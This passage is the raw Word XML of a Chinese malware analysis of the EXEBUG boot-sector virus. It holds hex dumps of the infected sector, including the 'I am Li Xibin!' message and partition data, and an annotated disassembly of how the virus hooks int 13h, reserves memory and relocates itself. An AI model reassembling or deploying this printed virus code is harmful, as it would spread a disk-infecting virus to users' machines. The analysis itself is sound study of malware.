          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、辅助模块</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0169</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="1900" w:firstLine="3420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>53 51 52 06 56 57 0E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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0170  </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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1F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0E 07 BB 00 02 B9 01-00 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="32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32 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 B8 01 02 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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9C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> FF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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0180  1E 07 00 72 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="22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22 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7 07 EB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Tru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-1C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80 FA 80 75 04 88 16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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:0190  0B 02 FC B</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="9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9 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0 01 BE 1E-00 BF 1E </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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02 F</w:t>
        </w:r>
      </w:smartTag>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="3"/>
          <w:attr w:name="HasSpace" w:val="Tru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3 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4 B8 01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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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01A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0  03 41 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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9C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> FF 1E 07 00 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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5F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-5E 07 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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5A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 59 5B C3 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r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、病毒提示信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>“I am Li Xibin!”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="2650" w:firstLine="4770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>20 49                  I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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:01B0  20 61 6D 20 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>4C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 69 20 58-69 62 69 6E 21 0D          am Li Xibin!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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、分区表数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="2650" w:firstLine="4770"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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a"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>0A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 00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F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80: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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>01C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00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F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:01D0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00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F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:01E0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00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cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80: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F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>01F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3" w:rsidP="006D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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、系统扇区标志值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="2650" w:firstLine="4770"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>55 AA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3"/>
    <w:p w:rsidR="006D66C3" w:rsidRPr="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D66C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>三、病毒代码执行过程分析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 xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>跳转指令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0000:7C00 EB1C          JMP     7C1E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越过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BPB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>及病毒数据，跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7C1E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 xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>病毒自举指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1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0000:7C1E FA            CLI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关闭中断，开始设置程序运行空间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0000:7C1F 33C0          XOR     AX,AX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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>清零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0000:7C21 8ED8          MOV     DS,AX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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0000h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>段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0000:7C23 8ED0          MOV     SS,AX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栈底指针指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0000:7C00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0000:7C25 BC007C        MOV     SP,7C00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0000:7C28 8BF4          MOV     SI,SP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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS:SI</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0000:7C00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0000:7C2A FB            STI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开中断，程序运行空间设置结束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0000:7C2B C4064C00      LES     AX,[004C]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取</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int 13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>入口地址入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ES:AX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；保存正常</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int 13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>入口地址到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0000:7C07</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处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0000:7C2F A3077C        MOV     [7C07],AX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0000:7C32 8C06097C      MOV     [7C09],ES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0000:7C36 A11304        MOV     AX,[0413]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取</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>容量，单位</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>KB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0000:7C39 48            DEC     AX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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EXEBUG</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>病毒占用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2KB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0000:7C3A 48            DEC     AX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lastRenderedPageBreak/>
        <w:t>0000:7C3B B106          MOV     CL,06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算术左移比特数，计算病毒段地址用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0000:7C3D A31304        MOV     [0413],AX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写入当前可用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>容量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0000:7C40 D3E0          SHL     AX,CL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计算病毒常驻内存段地址</w:t>
      </w:r>
      <w:r w:rsidR="00F92F46" w:rsidRPr="00F92F46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>9F80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；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ES:DI</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向病毒常驻内存地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:0000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0000:7C42 8EC0          MOV     ES,AX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0000:7C44 B90002        MOV     CX,0200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搬家病毒数据共</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0200h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>字节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0000:7C47 33FF          XOR     DI,DI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0000:7C49 FC            CLD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地址沿递增方向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；从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS:SI</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>字节到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ES:DI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0000:7C4A F3            REPZ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0000:7C4B A4            MOVSB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0000:7C4C B88800        MOV     AX,0088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病毒自举指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>入口地址偏移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0000:7C4F 06            PUSH    ES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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ES:AX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向自举指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:0088</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）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0000:7C50 50            PUSH    AX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0000:7C51 CB            RETF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控制权转病毒自举指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2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 xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>病毒自举指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
